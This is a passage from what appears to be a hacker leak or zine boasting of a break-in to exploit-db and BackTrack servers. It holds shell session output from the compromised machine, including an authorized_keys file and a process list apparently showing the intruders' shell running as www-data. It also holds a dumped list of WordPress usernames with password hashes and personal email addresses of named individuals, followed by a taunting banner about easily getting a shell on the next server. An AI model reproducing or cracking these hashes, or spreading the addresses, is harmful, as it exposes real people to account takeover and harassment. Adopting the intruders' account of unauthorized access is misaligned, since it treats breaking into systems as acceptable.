  3183. # To enable empty passwords, change to yes (NOT RECOMMENDED)
  3184. PermitEmptyPasswords no
  3185.  
  3186. # Change to yes to enable challenge-response passwords (beware issues with
  3187. # some PAM modules and threads)
  3188. ChallengeResponseAuthentication no
  3189.  
  3190. # Change to no to disable tunnelled clear text passwords
  3191. PasswordAuthentication yes
  3192.  
  3193. # Kerberos options
  3194. #KerberosAuthentication no
  3195. #KerberosGetAFSToken no
  3196. #KerberosOrLocalPasswd yes
  3197. #KerberosTicketCleanup yes
  3198.  
  3199. # GSSAPI options
  3200. #GSSAPIAuthentication no
  3201. #GSSAPICleanupCredentials yes
  3202.  
  3203. X11Forwarding yes
  3204. X11DisplayOffset 10
  3205. PrintMotd no
  3206. PrintLastLog yes
  3207. TCPKeepAlive yes
  3208. #UseLogin no
  3209.  
  3210. #MaxStartups 10:30:60
  3211. #Banner /etc/issue.net
  3212.  
  3213. # Allow client to pass locale environment variables
  3214. AcceptEnv LANG LC_*
  3215.  
  3216. Subsystem sftp /usr/lib/openssh/sftp-server
  3217.  
  3218. # Set this to 'yes' to enable PAM authentication, account processing,
  3219. # and session processing. If this is enabled, PAM authentication will
  3220. # be allowed through the ChallengeResponseAuthentication and
  3221. # PasswordAuthentication.  Depending on your PAM configuration,
  3222. # PAM authentication via ChallengeResponseAuthentication may bypass
  3223. # the setting of "PermitRootLogin without-password".
  3224. # If you just want the PAM account and session checks to run without
  3225. # PAM authentication, then enable this but set PasswordAuthentication
  3226. # and ChallengeResponseAuthentication to 'no'.
  3227. UsePAM yes
  3228.  
  3229. $ cd /home
  3230.  
  3231. $ ls -la
  3232. total 12
  3233. drwxr-xr-x  3 root   root   4096 Aug  3 11:48 .
  3234. drwxr-xr-x 26 root   root   4096 Nov 30 06:53 ..
  3235. drwxr-xr-x  7 emgent emgent 4096 Aug  7 07:45 emgent
  3236.  
  3237. $ cd emgent
  3238.  
  3239. $ ls -la
  3240. total 48
  3241. drwxr-xr-x 7 emgent emgent 4096 Aug  7 07:45 .
  3242. drwxr-xr-x 3 root   root   4096 Aug  3 11:48 ..
  3243. -rw------- 1 emgent emgent  259 Oct 18 11:39 .bash_history
  3244. -rw-r--r-- 1 emgent emgent  220 Aug  3 11:48 .bash_logout
  3245. -rw-r--r-- 1 emgent emgent 3103 Aug  3 11:48 .bashrc
  3246. drwx------ 2 emgent emgent 4096 Aug  3 11:49 .cache
  3247. drwx------ 2 emgent emgent 4096 Aug  3 11:49 .irssi
  3248. -rw------- 1 emgent emgent    9 Aug  3 11:50 .nano_history
  3249. -rw-r--r-- 1 emgent emgent  675 Aug  3 11:48 .profile
  3250. drwxr-xr-x 2 emgent emgent 4096 Aug  3 11:49 .ssh
  3251. drwxr-xr-x 3 emgent emgent 4096 Aug  7 07:45 .subversion
  3252. drwxr-xr-x 4 emgent emgent 4096 Aug  7 07:46 exploitdb
  3253.  
  3254.  
  3255.  
  3256. $ cd .ssh
  3257.  
  3258. $ ls
  3259. authorized_keys
  3260. cat authorized_keys
  3261. ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy
  3262.  
  3263. $ ps aux
  3264. USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
  3265. root         1  0.0  0.0  23680  1244 ?        Ss   Nov11   0:07 /sbin/init
  3266. root         2  0.0  0.0      0     0 ?        S    Nov11   0:00 [kthreadd]
  3267. root         3  0.0  0.0      0     0 ?        S    Nov11   0:01 [migration/0]
  3268. root         4  0.0  0.0      0     0 ?        S    Nov11   0:12 [ksoftirqd/0]
  3269. root         5  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/0]
  3270. root         6  0.0  0.0      0     0 ?        S    Nov11   0:02 [migration/1]
  3271. root         7  0.0  0.0      0     0 ?        S    Nov11   0:04 [ksoftirqd/1]
  3272. root         8  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/1]
  3273. root         9  0.0  0.0      0     0 ?        S    Nov11   0:02 [migration/2]
  3274. root        10  0.0  0.0      0     0 ?        S    Nov11   0:02 [ksoftirqd/2]
  3275. root        11  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/2]
  3276. root        12  0.0  0.0      0     0 ?        S    Nov11   0:01 [migration/3]
  3277. root        13  0.0  0.0      0     0 ?        S    Nov11   0:05 [ksoftirqd/3]
  3278. root        14  0.0  0.0      0     0 ?        S    Nov11   0:00 [watchdog/3]
  3279. root        15  0.0  0.0      0     0 ?        S    Nov11   0:32 [events/0]
  3280. root        16  0.0  0.0      0     0 ?        S    Nov11  13:44 [events/1]
  3281. root        17  0.0  0.0      0     0 ?        S    Nov11   0:17 [events/2]
  3282. root        18  0.0  0.0      0     0 ?        S    Nov11   0:18 [events/3]
  3283. root        19  0.0  0.0      0     0 ?        S    Nov11   0:00 [cpuset]
  3284. root        20  0.0  0.0      0     0 ?        S    Nov11   0:00 [khelper]
  3285. root        21  0.0  0.0      0     0 ?        S    Nov11   0:00 [netns]
  3286. root        22  0.0  0.0      0     0 ?        S    Nov11   0:00 [async/mgr]
  3287. root        23  0.0  0.0      0     0 ?        S    Nov11   0:00 [pm]
  3288. root        25  0.0  0.0      0     0 ?        S    Nov11   0:02 [sync_supers]
  3289. root        26  0.0  0.0      0     0 ?        S    Nov11   0:04 [bdi-default]
  3290. root        27  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/0]
  3291. root        28  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/1]
  3292. root        29  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/2]
  3293. root        30  0.0  0.0      0     0 ?        S    Nov11   0:00 [kintegrityd/3]
  3294. root        31  0.0  0.0      0     0 ?        S    Nov11  11:09 [kblockd/0]
  3295. root        32  0.0  0.0      0     0 ?        S    Nov11   2:17 [kblockd/1]
  3296. root        33  0.0  0.0      0     0 ?        S    Nov11   1:33 [kblockd/2]
  3297. root        34  0.0  0.0      0     0 ?        S    Nov11   1:14 [kblockd/3]
  3298. root        35  0.0  0.0      0     0 ?        S    Nov11   0:00 [kacpid]
  3299. root        36  0.0  0.0      0     0 ?        S    Nov11   0:00 [kacpi_notify]
  3300. root        37  0.0  0.0      0     0 ?        S    Nov11   0:00 [kacpi_hotplug]
  3301. root        38  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/0]
  3302. root        39  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/1]
  3303. root        40  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/2]
  3304. root        41  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata/3]
  3305. root        42  0.0  0.0      0     0 ?        S    Nov11   0:00 [ata_aux]
  3306. root        43  0.0  0.0      0     0 ?        S    Nov11   0:00 [ksuspend_usbd]
  3307. root        44  0.0  0.0      0     0 ?        S    Nov11   0:00 [khubd]
  3308. root        45  0.0  0.0      0     0 ?        S    Nov11   0:00 [kseriod]
  3309. root        46  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmmcd]
  3310. root        51  0.0  0.0      0     0 ?        S    Nov11   0:00 [khungtaskd]
  3311. root        52  0.0  0.0      0     0 ?        S    Nov11   0:30 [kswapd0]
  3312. root        53  0.0  0.0      0     0 ?        SN   Nov11   0:00 [ksmd]
  3313. root        54  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/0]
  3314. root        55  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/1]
  3315. root        56  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/2]
  3316. root        57  0.0  0.0      0     0 ?        S    Nov11   0:00 [aio/3]
  3317. root        58  0.0  0.0      0     0 ?        S    Nov11   0:00 [ecryptfs-kthrea]
  3318. root        59  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/0]
  3319. root        60  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/1]
  3320. root        61  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/2]
  3321. root        62  0.0  0.0      0     0 ?        S    Nov11   0:00 [crypto/3]
  3322. root        65  0.0  0.0      0     0 ?        S    Nov11   0:00 [pciehpd]
  3323. root        66  0.0  0.0      0     0 ?        S    Nov11   0:00 [scsi_eh_0]
  3324. root        67  0.0  0.0      0     0 ?        S    Nov11   0:00 [scsi_eh_1]
  3325. root        69  0.0  0.0      0     0 ?        S    Nov11   0:00 [kstriped]
  3326. root        70  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/0]
  3327. root        71  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/1]
  3328. root        72  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/2]
  3329. root        73  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpathd/3]
  3330. root        74  0.0  0.0      0     0 ?        S    Nov11   0:00 [kmpath_handlerd]
  3331. root        75  0.0  0.0      0     0 ?        S    Nov11   0:00 [ksnapd]
  3332. root        76  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/0]
  3333. root        77  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/1]
  3334. root        78  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/2]
  3335. root        79  0.0  0.0      0     0 ?        S    Nov11   0:00 [kondemand/3]
  3336. root        80  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/0]
  3337. root        81  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/1]
  3338. root        82  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/2]
  3339. root        83  0.0  0.0      0     0 ?        S    Nov11   0:00 [kconservative/3]
  3340. root       191  0.0  0.0      0     0 ?        S    Nov11   1:03 [mpt_poll_0]
  3341. root       192  0.0  0.0      0     0 ?        S    Nov11   0:00 [mpt/0]
  3342. root       268  0.0  0.0      0     0 ?        S    Nov11   0:00 [scsi_eh_2]
  3343. root       285  0.3  0.0      0     0 ?        S    Nov11 125:09 [jbd2/sda1-8]
  3344. root       286  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
  3345. root       287  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
  3346. root       288  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
  3347. root       289  0.0  0.0      0     0 ?        S    Nov11   0:00 [ext4-dio-unwrit]
  3348. root       322  0.3  0.0      0     0 ?        S    Nov11 115:40 [flush-8:0]
  3349. root       347  0.0  0.0  16904   640 ?        S    Nov11   0:00 upstart-udev-bridge --daemon
  3350. root       363  0.0  0.0  16920   416 ?        S<s  Nov11   0:00 udevd --daemon
  3351. root       582  0.0  0.0      0     0 ?        S    Nov11   0:00 [kpsmoused]
  3352. syslog     714  0.0  0.0 191492  1148 ?        Sl   Nov11   3:22 rsyslogd -c4
  3353. root       732  0.0  0.0  49260   528 ?        Ss   Nov11   0:01 /usr/sbin/sshd
  3354. root       773  0.0  0.0   6080   284 tty4     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty4
  3355. root       777  0.0  0.0   6080   284 tty5     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty5
  3356. root       787  0.0  0.0   6080   284 tty2     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty2
  3357. root       788  0.0  0.0   6080   284 tty3     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty3
  3358. root       792  0.0  0.0   6080   284 tty6     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty6
  3359. root       806  0.0  0.0  21076   428 ?        Ss   Nov11   0:07 cron
  3360. daemon     807  0.0  0.0  18884   348 ?        Ss   Nov11   0:00 atd
  3361. root       817  0.0  0.0  11284   428 ?        Ss   Nov11   1:53 /usr/sbin/irqbalance
  3362. root       950  0.0  0.0  84384   848 ?        Ss   Nov11   1:24 sendmail: MTA: accepting connections
  3363. root      1318  0.0  0.0  53108  4076 ?        Sl   Nov11   7:28 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock
  3364. root      1354  0.0  0.0  97040   408 ?        Ss   Nov11   0:07 /usr/bin/svnserve -d -r /var/svn/
  3365. root      1357  0.0  0.0   6080   284 tty1     Ss+  Nov11   0:00 /sbin/getty -8 38400 tty1
  3366. root      3467  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfs_mru_cache]
  3367. root      3468  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/0]
  3368. root      3469  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/1]
  3369. root      3470  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/2]
  3370. root      3471  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfslogd/3]
  3371. root      3472  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/0]
  3372. root      3473  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/1]
  3373. root      3474  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/2]
  3374. root      3475  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsdatad/3]
  3375. root      3476  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/0]
  3376. root      3477  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/1]
  3377. root      3478  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/2]
  3378. root      3479  0.0  0.0      0     0 ?        S    Nov30   0:00 [xfsconvertd/3]
  3379. root      3489  0.0  0.0  16980   372 ?        S<   Nov30   0:00 udevd --daemon
  3380. root      3490  0.0  0.0  16980   376 ?        S<   Nov30   0:00 udevd --daemon
  3381. root      3491  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsIO]
  3382. root      3492  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
  3383. root      3493  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
  3384. root      3494  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
  3385. root      3495  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsCommit]
  3386. root      3496  0.0  0.0      0     0 ?        S    Nov30   0:00 [jfsSync]
  3387. root      4114  0.0  0.0 107552  1928 ?        S    Nov23   0:00 /usr/bin/svnserve -d -r /var/svn/
  3388. root      7702  0.0  0.0 107420  1960 ?        S    13:31   0:00 /usr/bin/svnserve -d -r /var/svn/
  3389. root      8080  0.1  0.1 346236 11548 ?        Ss   Nov26  18:14 /usr/sbin/apache2 -k start
  3390. root      9853  0.0  0.0   9756   384 ?        Ss   Nov11   1:04 tail -f /var/log/apache2/jesys.log
  3391. www-data 10874  0.0  0.6 354384 38764 ?        S    14:15   0:00 /usr/sbin/apache2 -k start
  3392. www-data 10909  0.0  0.0  25632  2876 ?        S    14:15   0:00 dhcpcd
  3393. www-data 10910  0.0  0.0   4096   656 ?        S    14:15   0:00 /bin/sh
  3394. www-data 13491  0.1  0.6 356496 39580 ?        S    14:54   0:01 /usr/sbin/apache2 -k start
  3395. root     13493  0.1  0.1 116628 11268 ?        S    14:54   0:00 /usr/bin/svnserve -d -r /var/svn/
  3396. www-data 13510  0.0  0.0   4040   524 ?        S    14:55   0:00 cat www.tar.gz
  3397. root     13561  0.0  0.0 107420  1940 ?        S    Nov30   0:00 /usr/bin/svnserve -d -r /var/svn/
  3398. www-data 13681  0.1  0.5 354240 32356 ?        S    14:57   0:00 /usr/sbin/apache2 -k start
  3399. www-data 13884  0.1  0.5 354792 33064 ?        S    14:59   0:00 /usr/sbin/apache2 -k start
  3400. www-data 13889  0.2  0.5 353632 31568 ?        S    14:59   0:01 /usr/sbin/apache2 -k start
  3401. www-data 13960  0.0  0.6 354384 38812 ?        S    15:01   0:00 /usr/sbin/apache2 -k start
  3402. www-data 13976  0.2  0.5 355192 32200 ?        S    15:01   0:00 /usr/sbin/apache2 -k start
  3403. www-data 14022  0.0  0.0  25632  2876 ?        S    15:02   0:00 dhcpcd
  3404. www-data 14023  0.0  0.0   4096   628 ?        S    15:02   0:00 /bin/sh
  3405. www-data 14026  0.2  0.5 353888 33228 ?        S    15:02   0:00 /usr/sbin/apache2 -k start
  3406. www-data 14027  0.1  0.5 356512 32860 ?        S    15:02   0:00 /usr/sbin/apache2 -k start
  3407. www-data 14062  0.2  0.5 353548 32144 ?        S    15:03   0:00 /usr/sbin/apache2 -k start
  3408. www-data 14063  0.1  0.5 353644 30840 ?        S    15:03   0:00 /usr/sbin/apache2 -k start
  3409. www-data 14152  0.2  0.5 353376 31236 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3410. www-data 14154  0.3  0.5 352856 31284 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3411. www-data 14159  0.1  0.5 353888 30852 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3412. www-data 14160  0.2  0.5 355332 31280 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3413. www-data 14163  0.1  0.5 354204 31520 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3414. www-data 14183  0.1  0.4 353804 30404 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3415. www-data 14185  0.2  0.4 352724 30460 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3416. www-data 14188  0.2  0.5 353544 32600 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3417. www-data 14194  0.1  0.4 353880 30564 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3418. www-data 14201  0.1  0.5 353500 31264 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3419. www-data 14204  0.2  0.5 354516 32044 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3420. www-data 14205  0.1  0.4 353360 29148 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3421. ossecm   14276  0.0  0.0  16844   644 ?        S    Dec02   0:01 /var/ossec/bin/ossec-maild
  3422. root     14286  0.0  0.0  12496   576 ?        S    Dec02   0:03 /var/ossec/bin/ossec-execd
  3423. ossec    14291  0.0  0.0  14924  3052 ?        S    Dec02   0:43 /var/ossec/bin/ossec-analysisd
  3424. root     14295  0.0  0.0   4236   584 ?        S    Dec02   0:22 /var/ossec/bin/ossec-logcollector
  3425. www-data 14315  0.0  0.4 352972 29480 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3426. www-data 14316  0.2  0.5 353360 31168 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3427. www-data 14317  0.1  0.5 354404 30832 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3428. www-data 14345  0.2  0.4 352592 30052 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3429. www-data 14346  0.1  0.4 354008 30416 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3430. www-data 14348  0.1  0.4 352356 29156 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3431. www-data 14350  0.0  0.1 347492 10892 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3432. www-data 14351  0.1  0.4 353272 30452 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3433. www-data 14352  0.3  0.5 354176 31516 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3434. www-data 14355  0.3  0.4 352328 29492 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3435. www-data 14356  0.2  0.5 354200 31508 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3436. www-data 14357  0.0  0.4 352584 28180 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3437. root     14361  0.0  0.0   4996  1664 ?        S    Dec02   0:34 /var/ossec/bin/ossec-syscheckd
  3438. ossec    14365  0.0  0.0  12764   844 ?        S    Dec02   0:00 /var/ossec/bin/ossec-monitord
  3439. www-data 14366  0.2  0.4 352348 29836 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3440. www-data 14367  0.1  0.4 353492 30468 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3441. www-data 14369  0.1  0.4 353424 30616 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3442. www-data 14370  0.1  0.5 356216 31440 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3443. www-data 14371  0.2  0.5 353996 31636 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3444. www-data 14372  0.1  0.4 352356 28228 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3445. www-data 14377  0.0  0.1 347236 10808 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3446. www-data 14378  0.2  0.4 352612 29308 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3447. root     14386  0.0  0.0      0     0 ?        Z    15:07   0:00 [host-deny.sh] <defunct>
  3448. root     14387  0.0  0.0      0     0 ?        Z    15:07   0:00 [firewall-drop.s] <defunct>
  3449. www-data 14407  0.4  0.5 354384 32672 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3450. www-data 14408  0.1  0.4 352604 29276 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3451. www-data 14412  0.3  0.5 354716 32420 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3452. www-data 14413  0.4  0.4 352592 29272 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3453. www-data 14414  0.2  0.4 352600 28200 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3454. www-data 14415  0.3  0.4 352724 29088 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3455. www-data 14416  0.2  0.4 353776 29452 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3456. www-data 14417  0.2  0.4 353136 28616 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3457. www-data 14418  0.3  0.4 353520 29500 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3458. www-data 14419  0.7  0.0      0     0 ?        Z    15:08   0:00 [apache2] <defunct>
  3459. www-data 14420  0.5  0.5 353976 31084 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3460. www-data 14421  0.3  0.4 353252 29180 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3461. www-data 14422  0.0  0.1 346724  8076 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3462. www-data 14423  0.6  0.5 354352 31720 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3463. www-data 14424  0.4  0.4 353808 29848 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3464. www-data 14425  0.3  0.4 352584 28252 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3465. www-data 14426  0.1  0.1 346748 10564 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3466. www-data 14427  0.6  0.4 352976 28944 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3467. www-data 14428  0.0  0.1 346724  8204 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3468. www-data 14429  0.0  0.1 346724  8196 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3469. www-data 14430  0.7  0.4 352976 29032 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3470. www-data 14431  0.9  0.4 353668 30120 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3471. www-data 14432  0.9  0.4 353368 29668 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3472. www-data 14433  0.8  0.4 352976 28836 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3473. www-data 14435  1.3  0.4 352716 29364 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3474. www-data 14436  1.8  0.4 353736 30320 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3475. www-data 14437  0.1  0.1 346236  7760 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3476. www-data 14438  0.0  0.0  14976  1116 ?        R    15:08   0:00 ps aux
  3477. root     19786  0.0  0.0 107420  1884 ?        S    Nov16   0:00 /usr/bin/svnserve -d -r /var/svn/
  3478. root     19983  0.0  0.0 107420  1940 ?        S    Nov29   0:00 /usr/bin/svnserve -d -r /var/svn/
  3479. root     19989  0.0  0.0 107420  1884 ?        S    Nov16   0:00 /usr/bin/svnserve -d -r /var/svn/
  3480. root     20015  0.0  0.0 107420  1884 ?        S    Nov16   0:00 /usr/bin/svnserve -d -r /var/svn/
  3481. root     20286  0.0  0.0 107420  1888 ?        S    Nov18   0:00 /usr/bin/svnserve -d -r /var/svn/
  3482. mysql    22394 10.4 24.9 2441860 1529604 ?     Ssl  Nov12 3357:17 /usr/sbin/mysqld
  3483.  
  3484. $ df -h
  3485. Filesystem            Size  Used Avail Use% Mounted on
  3486. /dev/sda1              48G   17G   29G  37% /
  3487. none                  3.0G  172K  3.0G   1% /dev
  3488. none                  3.0G     0  3.0G   0% /dev/shm
  3489. none                  3.0G   56K  3.0G   1% /var/run
  3490. none                  3.0G     0  3.0G   0% /var/lock
  3491. none                  3.0G     0  3.0G   0% /lib/init/rw
  3492. none                   48G   17G   29G  37% /var/lib/ureadahead/debugfs
  3493.  
  3494. Wordpress:
  3495. admin:$P$B./Y8qG9A2YuqIz4uBAjFRo.9Yv0Fb1::muts@offsec.com
  3496. dookie2000ca:$P$B7YVdu0JG/JOf2YAS8WsmQqHnZHf.b/:dookie2000ca:dookie@exploit-db.com
  3497. innrwrld:$P$BaJi4YkAt5o/paWUfDMdOOWuqHx/is/:innrwrld:innrwrld@exploit-db.com
  3498. ivan:$P$B/YVWEkaYIq3s2QLSmVB/wvXWYqoM80::centaur.mail@gmail.com
  3499. sinn3r:$P$BYzu/ozErhWi8hB8IPFdr6Tv2R9rat/:3r:sinn3r@exploit-db.com
  3500. loneferret:$P$Bgsl0.nlu4De51qkI8MDoeHDS6iLcM1:loneferret:loneferret@exploit-db.com
  3501. ronin:$P$BFw9OFuWa1s/t5DUJwKO6A0Otfkewo0::ronin@exploit-db.com
  3502. dijital1:$P$BirOcybWYDo/Z/wrJ5zBq2zaGElV.f/:dijital1:rlh@ciphermonk.net
  3503. emgent:$P$BYiha9WKXDzXQm8A8RXboRc7zZuus0.::emgent@backtrack-linux.org
  3504. j0fer:$P$Bgtsc7w.Vb6mCkJfJi7JkSO5zJUEBY.::j0fer@exploit-db.com
  3505. ReL1K:$P$B6DyRPNYrBuC.WRv5GrDnFg3wAQPo91::kennedyd013@gmail.com
  3506. Xpl0it:$P$BGBdVhFBaUM8s9ooGcmB01t.zoK.0V0::mr.xpl0it@gmail.com
  3507. fdiskyou:$P$BlgwWd3EmVg4SsfIxzOjqUQfGKfLZD0:fdiskyou:rui@exploit-db.com
  3508. rawjaw:$P$Bovffv59pNKpCOOvKlbGqFOmAh.HKb0::rawjaw@exploit-db.com
  3509. djokica:$P$BNeyg6NPYJWO9fzjfZs1okvMiM0vq51::centaur@pavko.info
  3510. xxDigiPxx:$P$B2eEGgTNsZnM4DFpIr4kNrKXv.ivyg/:xxdigipxx:xxtwistedpairxx@comcast.net
  3511. muts:$P$Bn.MAuG.OlZ1NtTxq0WWAUwhVEfusC.::muts@offensive-security.com
  3512. Ryujin:$P$BZ75UnhRqkJZj82bWfXbeD6dVxzXTG0::ryujin@offsec.com
  3513. didn0t:$P$BkGM.gSmmmuDlkJUKjCzy1LfUn9AnS.::paul@pizza.org
  3514. zelik:$P$BYjCAaqW0tcdNV3MZviRZoN./.HMKn0::tal.zeltzer@gmail.com
  3515. bitform:$P$BLk7y3.7JTn12lRYj25A/JXJ1W0SIA1::mattgraeber@gmail.com
  3516. bolexxx:$P$B1liji1bDZoOOwnVwV3Aa59Mqux0FC1::bolexxx@offsec.com
  3517. h00die:$P$Behl/g/GHQo5zxciUMgjPPzu7ZI8nO/::ragecyr@exploit-db.com
  3518. MaXe:$P$B6PKmgTlcm5L5kpysXfksmEmRfMy6U.::MaXe@intern0t.net
  3519. marked_doe:$P$By1rR96ByDsyil/yQa79qBE/A7nbOA1:marked_doe:marc@doudiet.net
  3520. code0wnz:$P$Bw1OuJHHzMtUBd8oSjmFoQYKtzjaC..:code0wnz:code0wnz@gmail.com
  3521. Dr_IDE:$P$BR.ReeHZDabreI8G0D5NARv8oY6SOP/::dr_ide@hushmail.com
  3522. Sud0:$P$BqovGmeqOSCzsHFso9q4goSZ4hkWbK1: :Sud0.x90@gmail.com
  3523. TecR0c:$P$BXoaJm6vL1VKJWz.K3m1M.XXVoXU9K/::tecr0c@corelan.be
  3524. kripthor:$P$BpUEGtZ3PvzfYotKDvvRA1AU9U4.iq1:kripthor:umbelino@crazydog.pt
  3525. ryp:$P$BwQ3FGe9q7spL3vkhxTyYMBkL4UGOQ.::adam@rypmarketing.com
  3526. fdisk:$P$Blv3X9wG6b/Yo3SDi22/nIJ34t2jGi/::ruifilipe.reis@gmail.com
  3527. root-boy:$P$BWq8dOxSe/HKG/kE3cXpGyAOgR6F.n1:root-boy:root-boy@exploit-db.com
  3528.  
  3529. ,_._._._._._._._|____________________________________________________
  3530. |_|_|_|_|_|_|_|_|___________________________________________________/
  3531.   ~ backtrack ~ !                                                    
  3532.                                                                      
  3533. Since we already tapped into exploit-db and their server lies  in  the
  3534. same subnet  with  backtrack,  we  decided  to  check  out  their  mad
  3535. security. Backtrack is run by muts, the same guy who also  administers
  3536. exploit-db, so no wonder why it was super easy to get a shell...      
  3537.  
  3538.  
  3539. $ uname -a
